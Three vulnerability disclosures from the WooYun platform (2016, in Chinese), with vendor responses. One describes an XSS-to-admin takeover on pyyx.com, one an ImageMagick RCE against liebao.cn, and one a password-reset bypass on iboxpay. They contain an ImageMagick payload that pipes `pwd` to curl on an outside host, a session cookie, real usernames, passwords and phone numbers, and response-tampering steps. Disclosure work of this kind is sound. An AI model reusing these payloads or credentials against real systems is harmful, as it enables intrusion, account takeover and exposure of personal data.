漏洞详情披露状态： 2016-04-28： 细节已通知厂商并且等待厂商处理中2016-04-29： 厂商已经确认，细节仅向厂商公开2016-05-09： 细节向核心白帽子及相关领域专家公开2016-05-19： 细节向普通白帽子公开2016-05-29： 细节向实习白帽子公开2016-06-13： 细节向公众公开简要描述：一个小小的爆破导致的大数据泄露此款APP被好多明星投过资从一个无用的辣鸡xss，直接捣入后台。虽然没写太明白，但是还是比较值得学习的。不是进不去后台，我们就没辙了。爆破是个好思路。例如习题宝那个案例等。。都是cookie无效导致进入后台的猥琐思路详细说明： 反馈建议插入xsslocation : http://www.pyyx.com/admin/impression/comment?all=1&p=8toplocation : http://www.pyyx.com/admin/impression/comment?all=1&p=8cookie : Hm_lvt_2b1927a2b9ad3a599ce6414b15f6536c=1461735662; default_request_id=2fb80d7ae68a86dacdf7fd4490e2c72b伪装不进去。哎。。爆破也没用。需要电话号码和密码登录才可以后面扫了下子域名找到：http://redmine.pyyx.com然后爆破得到弱口令dengwuyu/dengwuyu刚刚好搜索框找了下密码得到账号密码为13661582834/s123123然后我想着直接登录APP然后我就想到了卧槽我不是打到了后台吗http://www.pyyx.com/admin我登录试试呗？没想到真对了。。 尼玛，这人品。。。100万设备150万用户1000万微信用户核心功能设备使用列表推广APP漏洞证明：11修复方案：11版权声明：转载请注明来源 小龙@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：20确认时间：2016-04-29 11:29厂商回复：感谢！最新状态：暂无

漏洞详情披露状态： 2016-05-06： 细节已通知厂商并且等待厂商处理中2016-05-06： 厂商已经确认，细节仅向厂商公开2016-05-16： 细节向核心白帽子及相关领域专家公开2016-05-26： 细节向普通白帽子公开2016-06-05： 细节向实习白帽子公开2016-06-20： 细节向公众公开简要描述：rce详细说明： code 区域头像上传http://i.liebao.cn/index.htmlcode 区域push graphic-context viewbox 0 0 640 480 fill 'url(https://example.com/image.jpg"|curl http://[ip]/id=`pwd` 0>&1")' pop graphic-context漏洞证明：ImageMagick修复方案：等更新版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：10确认时间：2016-05-06 12:49厂商回复：感谢您对猎豹移动的关注与支持！最新状态：暂无

漏洞详情披露状态： 2016-05-04： 细节已通知厂商并且等待厂商处理中2016-05-05： 厂商已经确认，细节仅向厂商公开2016-05-15： 细节向核心白帽子及相关领域专家公开2016-05-25： 细节向普通白帽子公开2016-06-04： 细节向实习白帽子公开2016-06-20： 细节向公众公开简要描述：秒改密码详细说明：问题站点：http://ums.iboxpay.com/mcht-self/点击忘记密码这里需要找个存在的手机号在这个漏洞里的截图中有手机号 WooYun: 盒子支付多个高危漏洞打包或可涉及几十万数据 code 区域13823763891点击发送验证码后，随意填写验证码，抓取返回包修改status为1这里修改密码为wooyun漏洞证明：  修复方案：本地校验不准确版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：中漏洞Rank：8确认时间：2016-05-05 23:52厂商回复：感谢提醒。最新状态：暂无